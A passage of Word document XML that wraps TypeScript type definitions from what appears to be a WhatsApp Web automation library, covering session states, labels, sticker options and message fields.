        </w:rPr>
        <w:t xml:space="preserve">    MESSAGE_ACK = 'message_ack',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    GROUP_JOIN = 'group_join',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    GROUP_LEAVE = 'group_leave',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    GROUP_UPDATE = 'group_update',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    QR_RECEIVED = 'qr',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    DISCONNECTED = 'disconnected',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    STATE_CHANGED = 'change_state',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state of the WA Web session. You can listen to session state changes using [[onStateChanged]]. Just to be clear, some of these states aren't understood completely.</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STATE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Another WA web session has been opened for this account somewhere else.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CONFLICT = 'CONFLICT',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session is successfully connected and ready to send and receive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CONNECTED = 'CONNECTED',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WA web updates every fortnight (or so). This state would be emitted then.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DEPRECATED_VERSION = 'DEPRECATED_VERSION',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probably shows up when reloading an already authenticated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OPENING = 'OPENING',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probably shows up immediately after the QR code is scanned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PAIRING = 'PAIRING',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state probably represented a block on the proxy address your app is using.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PROXYBLOCK = 'PROXYBLOCK',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usually shows up when the session has been blocked by WA due to some issue with the browser/user agent. This is a different version of a Terms of Service Block from what we know. It may also show up when the host account is banned.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SMB_TOS_BLOCK = 'SMB_TOS_BLOCK',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trigger for this state is as of yet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TIMEOUT = 'TIMEOUT',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usually shows up when the session has been blocked by WA due to some issue with the browser/user agent. It literally stands for Terms of Service Block. It may also show up when the host account is banned.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TOS_BLOCK = 'TOS_BLOCK',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same (probably replacement) for CONFLICT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UNLAUNCHED = 'UNLAUNCHED',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`UNPAIRED` the page is waiting for a QR Code scan. If your state becomes `UNPAIRED` then the session is most likely signed out by the host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UNPAIRED = 'UNPAIRED',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state is fired when the QR code has not been scanned for a long time (about 1 minute). On the page it will show "Click to reload QR code"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UNPAIRED_IDLE = 'UNPAIRED_IDLE',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fired when the QR code is scanned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SYNCING = 'SYNCING',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This is fired when the connection between web and the host account primary device is disconnected. This is fired frequently to save battery.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DISCONNECTED = 'DISCONNECTED',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EasyApiResponse = {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    success: boolean,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    response: any</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 from './config'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">export * from './media'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">export * from './aliases'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">export * from './label'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">--- END FILE: packages/legacy-documented/src/api/model/index.ts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packages/legacy-documented/src/api/model/label.ts ---</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">import { ContactId, ChatId, MessageId } from "./aliases";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Label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internal ID of the label. Usually a number represented as a string e.g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text contents of the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items that are tagged with this label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items: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Labels can be applied to chats, contacts or individual messages. This represents the type of object the label is attached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"Chat" | "Contact" |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object that the label is atteched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ContactId | ChatId |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packages/legacy-documented/src/api/model/label.ts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packages/legacy-documented/src/api/model/media.ts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StickerMetadata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author of the sticker</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">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author: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pack of the sticker</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">     * @default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pack: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ALPHA FEATURE - NO GUARANTEES IT WILL WORK AS EXPECTED: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[REQUIRES AN INSIDERS LICENSE-KEY](https://gum.co/open-wa?tier=Insiders%20Program)</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Attempt to remove the background of the sticker. Only valid for paid licenses.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options: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`true`  - remove background after resizing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`HQ`    - remove background before resizing (i.e on original photo)</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removebg ?: boolean | 'HQ'</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Setting this to `true` will skip the resizing/square-cropping of the sticker. It will instead 'letterbox' the image with a transparent background.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keepScale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Applies a circular mask to the sticker. Works on images only for now.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circle ?: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Your Discord ID to get onto the sticker leaderboard!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discord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Crop position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Learn more: https://sharp.pixelplumbing.com/api-resize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@default `attention`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cropPosition ?: 'top' | 'right top' | 'right' | 'right bottom' | 'bottom' | 'left bottom' | 'left' | 'left top' | 'north' | 'northeast' | 'east' | 'southeast' | 'south' | 'southwest' | 'west' | 'northwest' | 'center' | 'centre' | 'entropy' | 'attention'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corner radius of the sticker when `stickerMetadata.circle` is set to true.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">     * @default `100`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">     * @minimum `1`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">     * @maximum `100`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">     * @multipleOf `1`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cornerRadius?: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type Mp4StickerConversionProcessOptions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Desired Frames per second of the sticker output</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">     * @default `10`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fps?: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video start time of the sticker</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">     * @default `00:00:00.0`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startTime?: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video end time of the sticker. By default, stickers are made from the first 5 seconds of the video</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">     * @default `00:00:05.0`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endTime?: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amount of times the video loops in the sticker. To save processing time, leave this as 0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">     * default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loop?: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Centres and crops the video.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">     * default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crop?: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Prints ffmpeg logs in the terminal</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">     * @default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log?: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number representing the WxH of the output sticker (default `512x512`). Lowering this number is a great way to process longer duration stickers. The max value is `512`.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">     * default `512`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square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export const defaultProcessOptions : Mp4StickerConversionProcessOptions = {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    fps: 10,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    startTime: `00:00:00.0`,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    endTime :  `00:00:05.0`,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    loop: 0,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    crop: true,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    log: false,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    square: 512</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">--- END FILE: packages/legacy-documented/src/api/model/media.ts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packages/legacy-documented/src/api/model/message.ts ---</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">import { ChatId, ContactId, MessageId, GroupChatId } from "./aliases";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">import { Button, Row, Section } from "./button";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">import { Chat } from "./chat";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">import { Contact } from "./contact";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type MessagePinDuration = "FifteenSeconds" | "FiveSeconds" | "OneDay" | "OneMinute" | "SevenDays" | "ThirtyDays"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Message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selected button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selectedButtonId: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message. Consists of the Chat ID and a unique string.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false_447123456789@c.us_7D914FEA78BE10277743F4B785045C37</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unique segment of the message id.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Example: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7D914FEA78BE10277743F4B785045C37</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body of the message. If the message type is `chat` , `body` will be the text of the chat. If the message type is some sort of media, then this body will be the thumbnail of the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device ID of the device that sent the message. This is only present if the message was sent from host account-linked session. This is useful for determining if a message was sent from a different mobile device (note that whenever a device) or a desktop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This will emit a number for the current controlled session also but the only way to know if the number represents the current session is by checking `local` (it will be `true` if the message was sent from the current session).</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the device ID is `0` then the message was sent from the "root" host account device.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might be undefined for incoming messages.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device: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message was sent from this controlled session this will be `true`. This is useful for determining if a message was sent from a different mobile device (note that whenever a device) or a desktop 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local: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 convenient way to get the main text content from a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text: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the message, see [[MessageTypes]]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MessageTypes;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Used to checking the integrity of the decrypted media.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filehash ?: string;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  mimetype?: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latitude of a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longitude of a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lng?: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text associated with a location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loc?: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  notifyName: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 from which the message was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 id to which the message is being sent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 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Indicates whether the message is coming into the session or going out of the session. You can have a message sent by the host account show as `in` when the message was sent from another</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">   * session or from the host account device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self: "in" | "out";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length of the media in the message, if it exists.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duration?: string|number;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acknolwedgement state of a message [[MessageAck]]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ack: MessageAck;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  invis: boolean;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  isNewMsg: boolean;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  star: boolean;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  recvFresh: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message is sent as a broadcast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broadcast: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message has been forwarded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isForwarded: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labels associated with the message (used with business accounts)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labels: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all mentioned numbers in this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mentionedJidList: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message is of a media type, it may also have a caption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caption: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object of the account that sent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timestanmp of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`config.messagePreprocessor: "AUTO_DECRYPT_SAVE"` is set, media is decrypted and saved on disk in a folder called media relative to the current working directory.</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is the filePath of the decrypted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filePath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given filename of the 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filename ?: string;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  content: string;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  isGroupMsg: boolean;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  isMMS: boolean;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  isMedia: boolean;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  isNotification: boolean;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  isPSA: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message is from the host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fromMe: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chat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chat: Chat;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  chatId: ChatId;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  author: string;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  stickerAuthor?: string;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  stickerPack?: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@deprecated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Ironically, you should be using `deprecatedMms3Url` instead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clientUrl: string;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  deprecatedMms3Url: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this message is quoting (replying to) another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isQuotedMsgAvailable: boolean;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  quotedMsg ?: Message;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  quotedMsgObj ?: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When a user requests to join a group wihtin a community the request is received by the host as a message. This boolean will allow you to easily determine if the incoming message is a request to join a group.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If this is `true` then you need to determine within your own code whether or not to accept the user to the group which is indicated with `quotedRemoteJid` using `addParticipant`.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isGroupJoinRequest ?: GroupChatId;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message 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senderId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quoted group. Usually present when a user is requesting to join a group.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quotedRemoteJid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parent group ID (community ID - communities are just groups made up of other groups) of the group represented by `quotedRemoteJid`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quotedParentGroupJid ?: GroupChatId,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  mediaData: unknown;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  shareDuration: number;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  isAnimated: boolean;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  ctwaContext ?: {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    sourceUrl: string,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    thumbnail: string | null,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    mediaType: number,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    isSuspiciousLink: boolean | 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Is the message a "view once"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isViewOnce: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Use this to traverse the quote chain.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quoteMap: QuoteMap;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file after being uploaded to the cloud using a cloud upload message preprocessor.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cloudUrl?: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Buttons associated with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buttons ?: Button[]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List response associated with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listResponse ?: Row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list associated with the list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list ?: {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      "sections": Section[],</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      "title": string,</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"buttonText":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options of a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pollOptions ?: PollOption[],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reaction of the host account to this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reactionByMe ?: ReactionSender,  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    reactions: {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      aggregateEmoji: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senders of this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senders: ReactionSender[]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host account has reacted to this message with this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hasReactionByMe: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the reaction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ReactionSender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message being reacted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parentMsgKey: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ID of the sender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senderUserJid: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the reaction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msgKey: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text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reactionText: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    orphan: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reaction was seen/read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the reaction itself</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MessageId,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
